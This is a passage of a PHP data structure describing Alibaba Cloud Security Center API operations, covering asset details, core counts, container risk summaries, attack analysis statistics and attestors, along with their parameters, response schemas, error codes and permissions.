'description' => ''], ['errorCode' => 'GetAssetDetailFail', 'errorMessage' => 'Asset detail service has failed due to some unknown error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Query asset details', 'summary' => 'Queries the details of an asset (ECS instance).', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAssetDetailByUuids'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAssetDetailByUuids', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"92016EC8-D52D-49D8-9FF7-9EA340A950B9\\",\\n \\"AssetList\\": [\\n {\\n \\"InternetIp\\": \\"10.10.XX.XX\\",\\n \\"OsName\\": \\"CentOS 7.6 64位\\",\\n \\"Ip\\": \\"10.10.XX.XX\\",\\n \\"Os\\": \\"Linux\\",\\n \\"InstanceId\\": \\"i-rj9gda4wolo0zixi****\\",\\n \\"ClientStatus\\": \\"online\\",\\n \\"VpcInstanceId\\": \\"13231-331331\\",\\n \\"IntranetIp\\": \\"192.168.XX.XX\\",\\n \\"AssetType\\": \\"0\\",\\n \\"RegionId\\": \\"cn-shanghai\\",\\n \\"Uuid\\": \\"2a98f149-0256-414c-a29a-a69f8a75****\\",\\n \\"Flag\\": 0,\\n \\"RegionName\\": \\"cn-shenzhen\\",\\n \\"InstanceName\\": \\"TestInstanceName\\",\\n \\"Region\\": \\"cn-guangzhou\\",\\n \\"CpuInfo\\": \\"Intel(R) Xeon(R) Platinum 8163 CPU @ 2.50GHz\\",\\n \\"OsDetail\\": \\"Linux 64bit\\",\\n \\"CreateTime\\": 1603863599000,\\n \\"Kernel\\": \\"4.18.0-80.11.2.el8_0.x86_64\\",\\n \\"Bind\\": true,\\n \\"Tag\\": \\"test\\",\\n \\"Mem\\": 4,\\n \\"Memory\\": 1024,\\n \\"AuthVersion\\": 7,\\n \\"GroupTrace\\": \\"default\\",\\n \\"HostName\\": \\"test\\",\\n \\"AuthModifyTime\\": 1627974044000,\\n \\"SysInfo\\": \\"CentOS Linux 8.0.1905\\",\\n \\"Cpu\\": 4,\\n \\"ClientVersion\\": \\"2.0.0\\",\\n \\"IpList\\": [\\n \\"192.168.XX.XX\\"\\n ],\\n \\"MacList\\": [\\n \\"00:16:3*:1*:9*:cf\\"\\n ],\\n \\"DiskInfoList\\": [\\n \\"{diskName: \\\\\\"/dev/vda1\\\\\\", useSizeByte: 2998996992, totalSize: 40, useSize: 2, totalSizeByte: 42140479488}\\"\\n ]\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeAssetSummary' => [ 'summary' => 'Queries the core count statistics information of assets that are protected by Security Center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasGC725T', 'FEATUREsas36IOGX'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '0FA7F1F4-488D-52CA-9BFC-3E47793B49D1', 'title' => ''], 'AssetsSummary' => [ 'description' => 'The asset statistics information.', 'type' => 'object', 'properties' => [ 'TotalCoreNum' => ['description' => 'The total number of cores of assets in the current region.'."\n" ."\n" .'>Security Center uses independent service centers in the Chinese mainland and outside the Chinese mainland. You can check the endpoint to which you are connected to determine the current service region. For more information about the regions included in each service region, see [What is Security Center?](~~42302~~).', 'type' => 'integer', 'format' => 'int32', 'example' => '1022', 'title' => ''], 'TotalAssetAllRegion' => ['description' => 'The total number of assets across all regions.'."\n" .'>Security Center uses independent service centers in the Chinese mainland and outside the Chinese mainland. You can check the endpoint to which you are connected to determine the current service region. For more information about the regions included in each service region, see [What is Security Center?](~~42302~~).', 'type' => 'integer', 'format' => 'int32', 'example' => '2064', 'title' => ''], 'TotalCoreAllRegion' => ['description' => 'The total number of cores of assets across all regions.'."\n" .'>Security Center uses independent service centers in the Chinese mainland and outside the Chinese mainland. You can check the endpoint to which you are connected to determine the current service region. For more information about the regions included in each service region, see [What is Security Center?](~~42302~~).', 'type' => 'integer', 'format' => 'int32', 'example' => '3200', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query core count statistics information of protected assets', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAssetSummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAssetSummary', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0FA7F1F4-488D-52CA-9BFC-3E47793B49D1\\",\\n \\"AssetsSummary\\": {\\n \\"TotalCoreNum\\": 1022,\\n \\"TotalAssetAllRegion\\": 2064,\\n \\"TotalCoreAllRegion\\": 3200\\n }\\n}","type":"json"}]', ], 'DescribeAssetsScaProcessNum' => [ 'summary' => 'Queries the number of Java processes in an asset by using the asset fingerprints feature of Security Center.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '225158', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'UuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The UUIDs of the servers.'."\n", 'type' => 'array', 'items' => ['description' => 'The UUID of the server.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~141932~~) operation to query the UUID of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => '55bf7984-9b3b-4e8d-be8e-f3e5b0b4****', 'title' => ''], 'required' => true, 'maxItems' => 100, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'BizType', 'in' => 'query', 'schema' => ['description' => 'The type of the application process. Default value: java. Valid values:'."\n" ."\n" .'* **java**'."\n" .'* **php**'."\n", 'type' => 'string', 'required' => false, 'example' => 'java', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'Schema of Response', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'ACF97412-FD09-4D1F-994F-34DF12BREF20'], 'Data' => [ 'description' => 'The statistical results.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about a single statistical result.'."\n", 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the asset.'."\n" ."\n" .'> If no processes exist on the asset, no statistical result is returned.'."\n", 'type' => 'string', 'example' => '6690a46c-0edb-4663-a641-3629d1a9****', 'title' => ''], 'Count' => ['description' => 'The number of Java processes.'."\n" ."\n" .'> If no processes exist on the asset, no statistical result is returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => 'Parameter error, please check the input parameters.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"ACF97412-FD09-4D1F-994F-34DF12BREF20\\",\\n \\"Data\\": [\\n {\\n \\"Uuid\\": \\"6690a46c-0edb-4663-a641-3629d1a9****\\",\\n \\"Count\\": 2\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeAssetsScaProcessNum', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAssetsScaProcessNum'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAssetsScaProcessNum', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeAssetsSecurityEventSummary' => [ 'summary' => 'Queries risk statistics for container assets.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '113.108.XX.XX', 'title' => ''], ], [ 'name' => 'ContainerFieldName', 'in' => 'query', 'schema' => ['description' => 'The container search field. Valid values:'."\n" ."\n" .'- **instanceId**: container instance ID'."\n" .'- **clusterId**: cluster ID'."\n" .'- **regionId**: container region'."\n" .'- **clusterName**: cluster name'."\n" .'- **image**: image name'."\n" .'- **imageRepoName**: image repository name'."\n" .'- **imageRepoNamespace**: image repository namespace'."\n" .'- **imageRepoTag**: image repository tag'."\n" .'- **imageDigest**: image digest'."\n" .'- **clusterType**: cluster type'."\n" .'- **hostIp**: public IP address'."\n" .'- **pod**: pod'."\n" .'- **podIp**: pod IP address'."\n" .'- **containerId**: container ID'."\n" .'- **vulStatus**: whether the container has vulnerabilities'."\n" .'- **alarmStatus**: whether the container has security alerts'."\n" .'- **riskStatus**: whether the container has risks'."\n" .'- **riskLevel**: container risk level'."\n" .'- **containerScope**: container type.', 'type' => 'string', 'required' => false, 'example' => 'clusterName', 'title' => ''], ], [ 'name' => 'ContainerFieldValue', 'in' => 'query', 'schema' => ['description' => 'The value of the container search field.', 'type' => 'string', 'required' => false, 'example' => 'arms-prom-operator', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster that you want to query.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'cc58f827d893f4d7fb3e34b5d4395****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D03DD0FD-6041-5107-AC00-383E28F1****', 'title' => ''], 'Assets' => [ 'description' => 'The container asset risk statistics information list.', 'type' => 'array', 'items' => [ 'description' => 'The container asset risk statistics information.', 'type' => 'object', 'properties' => [ 'RiskCount' => ['description' => 'The number of assets that have risks.', 'type' => 'integer', 'format' => 'int64', 'example' => '16', 'title' => ''], 'TotalCount' => ['description' => 'The total number of assets.', 'type' => 'integer', 'format' => 'int64', 'example' => '30', 'title' => ''], 'AssetType' => ['description' => 'The asset type. Valid values:'."\n" ."\n" .'- **namespace**: namespace'."\n" .'- **clusters**: cluster'."\n" .'- **applications**: application'."\n" .'- **pods**: pod'."\n" .'- **containers**: container'."\n" .'- **images**: image'."\n" .'- **hosts**: node.', 'type' => 'string', 'example' => 'namespace', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query container asset risk statistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAssetsSecurityEventSummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAssetsSecurityEventSummary', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D03DD0FD-6041-5107-AC00-383E28F1****\\",\\n \\"Assets\\": [\\n {\\n \\"RiskCount\\": 16,\\n \\"TotalCount\\": 30,\\n \\"AssetType\\": \\"namespace\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeAttackAnalysisData' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => true, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '91995', 'abilityTreeNodes' => ['FEATUREsas8YMQ5V'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" ."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The details of attack analysis. Valid values:'."\n" ."\n" .'- **TOTAL**: number of attacks'."\n" ."\n" .'- **TREND**: attack trend'."\n" ."\n" .'- **PIE\\_CHART**: distribution of attacks by type'."\n" ."\n" .'- **SOURCE\\_TOP**: top 5 attack sources'."\n" ."\n" .'- **CLIENT\\_TOP**: top 5 attacked assets'."\n" ."\n" .'- **DETAILS**: attack details'."\n" ."\n" .'> If the Type parameter is set to **DETAILS**, you must specify the CurrentPage and PageSize parameters.', 'type' => 'string', 'required' => true, 'example' => 'DETAILS', 'title' => ''], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The timestamp at which the attack starts. By default, the statistics of the previous seven days are queried. Unit: seconds.'."\n" ."\n" .'> The start time that you specify must be within the previous 40 days.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1644027670', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The timestamp when the attack stops. Unit: seconds.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1649040221', 'title' => ''], ], [ 'name' => 'Data', 'in' => 'query', 'schema' => ['description' => 'The condition that is used to filter attack events.'."\n" ."\n" .'> The following list describes the valid values of crack\\_type:'."\n" ."\n" .'- 3: brute-force attack on MySQL'."\n" ."\n" .'- 4: FTP brute-force attack'."\n" ."\n" .'- 5: SSH brute-force attack'."\n" ."\n" .'- 6: RDP brute-force attack'."\n" ."\n" .'- 9: brute-force attack on Microsoft SQL Server'."\n" ."\n" .'- 101: intercepted attack on Java Struts 2'."\n" ."\n" .'- 102: intercepted attack on Redis'."\n" ."\n" .'- 103: communication with AntSword Webshell'."\n" ."\n" .'- 104: communication with China Chopper Webshell'."\n" ."\n" .'- 133: communication with XISE Webshell'."\n" ."\n" .'- sqli: SQL injection'."\n" ."\n" .'- codei: code execution'."\n" ."\n" .'- xss: cross-site scripting (XSS)'."\n" ."\n" .'- lfi: local file inclusion'."\n" ."\n" .'- rfi: remote file inclusion'."\n" ."\n" .'- webshell: trojan script'."\n" ."\n" .'- upload: vulnerability upload'."\n" ."\n" .'- path: directory traversal'."\n" ."\n" .'- bypass: unauthorized access'."\n" ."\n" .'- csrf: cross-site request forgery (CSRF)'."\n" ."\n" .'- crlf: carriage return line feed (CRLF)'."\n" ."\n" .'- other: others', 'type' => 'string', 'required' => false, 'example' => '{"crack_type":"9"}', 'title' => ''], ], [ 'name' => 'Base64', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to encode the value of the **client\\_url** field in the query results by using the Base64 algorithm. Valid values:'."\n" ."\n" .'- **true**: yes'."\n" ."\n" .'- **false**: no', 'type' => 'string', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Pages start from page **1**.'."\n" ."\n" .'> If the Type parameter is set to **DETAILS**, you must specify the CurrentPage parameter.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page.'."\n" ."\n" .'> If the Type parameter is set to **DETAILS**, you must specify the PageSize parameter.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The attack events. Valid values:'."\n" ."\n" .'- **client\\_url**: the URL of the attack request.'."\n" ."\n" .'- **internetIp**: the IP address of the asset.'."\n" ."\n" .'- **instanceName**: the name of the asset.'."\n" ."\n" .'- **table\\_src**: the data source.'."\n" ."\n" .'- **uuid**: the UUID of the asset.'."\n" ."\n" .'- **crack\\_method**: the method of the attack request.'."\n" ."\n" .'- **crack\\_hour**: the attack time.'."\n" ."\n" .'- **crack\\_src\\_ip**: the IP address from which the attack is launched.'."\n" ."\n" .'- **instanceId**: the ID of the asset.'."\n" ."\n" .'- **dst\\_port**: the attacked port.'."\n" ."\n" .'- **client\\_ip**: the attacked IP address.'."\n" ."\n" .'- **location**: the region from which the attack is launched.'."\n" ."\n" .'- **aliuid**: the ID of the Alibaba Cloud account.'."\n" ."\n" .'- **crack\\_cnt**: the number of times that the attack is launched.'."\n" ."\n" .'- **crack\\_type**: the type of the attack. Valid values:'."\n" ."\n" .' - **113**: improper authorization.'."\n" ."\n" .' - **112**: redirection attack.'."\n" ."\n" .' - **upload**: vulnerability upload.'."\n" ."\n" .' - **other**: others.'."\n" ."\n" .' - **webshell**: trojan script.'."\n" ."\n" .' - **201**: suspicious connection.'."\n" ."\n" .' - **9**: brute-force attack on Microsoft SQL Server.'."\n" ."\n" .' - **5**: SSH brute-force attack.'."\n" ."\n" .' - **6**: RDP brute-force attack.'."\n" ."\n" .' - **lfi**: local file inclusion.'."\n" ."\n" .' - **7**: code execution.'."\n" ."\n" .' - **sqli**: SQL injection.'."\n" ."\n" .' - **209**: web attack.'."\n" ."\n" .' - **31**: buffer overflow.'."\n" ."\n" .' - **3**: brute-force attack on MySQL.'."\n" ."\n" .' - **30**: clickjacking.'."\n" ."\n" .' - **4**: FTP brute-force attack.'."\n" ."\n" .' - **bypass**: unauthorized access.'."\n" ."\n" .' - **33**: format string.'."\n" ."\n" .' - **deeplearning**: others.'."\n" ."\n" .' - **32**: integer overflow.'."\n" ."\n" .' - **203**: brute-force attack.'."\n" ."\n" .' - **34**: race condition.'."\n" ."\n" .' - **rfi**: remote file inclusion.'."\n" ."\n" .' - **0**: SQL injection attack.'."\n" ."\n" .' - **212**: mining behavior.'."\n" ."\n" .' - **213**: reverse shell.'."\n" ."\n" .' - **211**: worm.'."\n" ."\n" .' - **61**: session timeout.'."\n" ."\n" .' - **20**: directory traversal.'."\n" ."\n" .' - **xss**: XSS attack.'."\n" ."\n" .' - **22**: unauthorized access.'."\n" ."\n" .' - **21**: scan attack.'."\n" ."\n" .' - **24**: file modification.'."\n" ."\n" .' - **26**: file deletion.'."\n" ."\n" .' - **25**: file reading.'."\n" ."\n" .' - **28**: CRLF injection.'."\n" ."\n" .' - **27**: logic error.'."\n" ."\n" .' - **29**: template injection.'."\n" ."\n" .' - **csrf**: CSRF.'."\n" ."\n" .' - **path**: directory traversal.'."\n" ."\n" .' - **crlf**: CRLF.'."\n" ."\n" .' - **102**: CSRF.'."\n" ."\n" .' - **103**: server-side request forgery (SSRF).'."\n" ."\n" .' - **101**: XSS.'."\n" ."\n" .' - **11**: file inclusion.'."\n" ."\n" .' - **10**: file upload.'."\n" ."\n" .' - **12**: vulnerability upload.'."\n" ."\n" .' - **15**: unauthorized access.'."\n" ."\n" .' - **14**: information leakage.'."\n" ."\n" .' - **17**: XML entity injection.'."\n" ."\n" .' - **16**: insecure configuration.'."\n" ."\n" .' - **19**: Lightweight Directory Access Protocol (LDAP) injection.'."\n" ."\n" .' - **18**: XPath injection.'."\n" ."\n" .' - **codei**: code execution.'."\n" ."\n" .' - **ai\\_webshell**: intelligent defense against webshell upload.'."\n" ."\n" .' - **alinet\\_webrce**: adaptive web attack defense.'."\n" ."\n" .' - **210**: JSP webshell upload.'."\n" ."\n" .' - **161**: webshell upload.', 'type' => 'string', 'example' => '[{\\"crack_hour\\":1662480000000,\\"crack_cnt\\":471},{\\"crack_hour\\":1662483600000,\\"crack_cnt\\":461},{\\"crack_hour\\":1662487200000,\\"crack_cnt\\":445},{\\"crack_hour\\":1662490800000,\\"crack_cnt\\":471},{\\"crack_hour\\":1662494400000,\\"crack_cnt\\":534},{\\"crack_hour\\":1662498000000,\\"crack_cnt\\":652},{\\"crack_hour\\":1662501600000,\\"crack_cnt\\":706},{\\"crack_hour\\":1662505200000,\\"crack_cnt\\":613},{\\"crack_hour\\":1662508800000,\\"crack_cnt\\":578},{\\"crack_hour\\":1662512400000,\\"crack_cnt\\":577},{\\"crack_hour\\":1662516000000,\\"crack_cnt\\":616},{\\"crack_hour\\":1662519600000,\\"crack_cnt\\":597},{\\"crack_hour\\":1662523200000,\\"crack_cnt\\":575},{\\"crack_hour\\":1662526800000,\\"crack_cnt\\":507}]', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page. Default value: 10.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => '4C1AE3F3-18FA-4108-BBB9-AFA1A032756C', 'title' => ''], 'Total' => ['description' => 'The total number of attack events returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '1000', 'title' => ''], 'Page' => ['description' => 'The page number of the returned page.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => 'Invalid parameter value.', 'description' => 'Invalid parameter.'], ['errorCode' => 'UserInstanceVersionNotSupportAttackAnalysisData', 'errorMessage' => 'Attack analysis data is not supported for the instance version.', 'description' => 'The user instance version does not support viewing attack analysis data.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => [ 'substitutions' => ['Sas::2018-12-03::ListAttackEventInfo'], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'DescribeAttackAnalysisData', 'summary' => 'Queries the statistics of attack analysis.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAttackAnalysisData', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": \\"[{\\\\\\\\\\\\\\"crack_hour\\\\\\\\\\\\\\":1662480000000,\\\\\\\\\\\\\\"crack_cnt\\\\\\\\\\\\\\":471},{\\\\\\\\\\\\\\"crack_hour\\\\\\\\\\\\\\":1662483600000,\\\\\\\\\\\\\\"crack_cnt\\\\\\\\\\\\\\":461},{\\\\\\\\\\\\\\"crack_hour\\\\\\\\\\\\\\":1662487200000,\\\\\\\\\\\\\\"crack_cnt\\\\\\\\\\\\\\":445},{\\\\\\\\\\\\\\"crack_hour\\\\\\\\\\\\\\":1662490800000,\\\\\\\\\\\\\\"crack_cnt\\\\\\\\\\\\\\":471},{\\\\\\\\\\\\\\"crack_hour\\\\\\\\\\\\\\":1662494400000,\\\\\\\\\\\\\\"crack_cnt\\\\\\\\\\\\\\":534},{\\\\\\\\\\\\\\"crack_hour\\\\\\\\\\\\\\":1662498000000,\\\\\\\\\\\\\\"crack_cnt\\\\\\\\\\\\\\":652},{\\\\\\\\\\\\\\"crack_hour\\\\\\\\\\\\\\":1662501600000,\\\\\\\\\\\\\\"crack_cnt\\\\\\\\\\\\\\":706},{\\\\\\\\\\\\\\"crack_hour\\\\\\\\\\\\\\":1662505200000,\\\\\\\\\\\\\\"crack_cnt\\\\\\\\\\\\\\":613},{\\\\\\\\\\\\\\"crack_hour\\\\\\\\\\\\\\":1662508800000,\\\\\\\\\\\\\\"crack_cnt\\\\\\\\\\\\\\":578},{\\\\\\\\\\\\\\"crack_hour\\\\\\\\\\\\\\":1662512400000,\\\\\\\\\\\\\\"crack_cnt\\\\\\\\\\\\\\":577},{\\\\\\\\\\\\\\"crack_hour\\\\\\\\\\\\\\":1662516000000,\\\\\\\\\\\\\\"crack_cnt\\\\\\\\\\\\\\":616},{\\\\\\\\\\\\\\"crack_hour\\\\\\\\\\\\\\":1662519600000,\\\\\\\\\\\\\\"crack_cnt\\\\\\\\\\\\\\":597},{\\\\\\\\\\\\\\"crack_hour\\\\\\\\\\\\\\":1662523200000,\\\\\\\\\\\\\\"crack_cnt\\\\\\\\\\\\\\":575},{\\\\\\\\\\\\\\"crack_hour\\\\\\\\\\\\\\":1662526800000,\\\\\\\\\\\\\\"crack_cnt\\\\\\\\\\\\\\":507}]\\",\\n \\"PageSize\\": 10,\\n \\"RequestId\\": \\"4C1AE3F3-18FA-4108-BBB9-AFA1A032756C\\",\\n \\"Total\\": 1000,\\n \\"Page\\": 1\\n}","type":"json"}]', ], 'DescribeAttestors' => [ 'summary' => 'Queries a list of witnesses.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address.'."\n", 'type' => 'string', 'required' => false, 'example' => '222.35.XXX.XXX', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the witness.'."\n", 'type' => 'string', 'required' => false, 'example' => 'attestor-auto-ad5316', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '122', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Attestors' => [ 'description' => 'The witnesses.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'KeyVersionId' => ['description' => 'The version ID of the Key Management Service (KMS) key.'."\n", 'type' => 'string', 'example' => '8d7c9c91-57ce-4cf4-a959-1e700e13****', 'title' => ''], 'KeyId' => ['description' => 'The ID of the KMS key.'."\n", 'type' => 'string', 'example' => '2e81355b-f8e7-4090-8082-a8f8124a****', 'title' => ''], 'Remark' => ['description' => 'The description.'."\n", 'type' => 'string', 'example' => 'attestor', 'title' => ''], 'Name' => ['description' => 'The name of the witness.'."\n", 'type' => 'string', 'example' => 'attestor-123', 'title' => ''], 'KeyRegionId' => 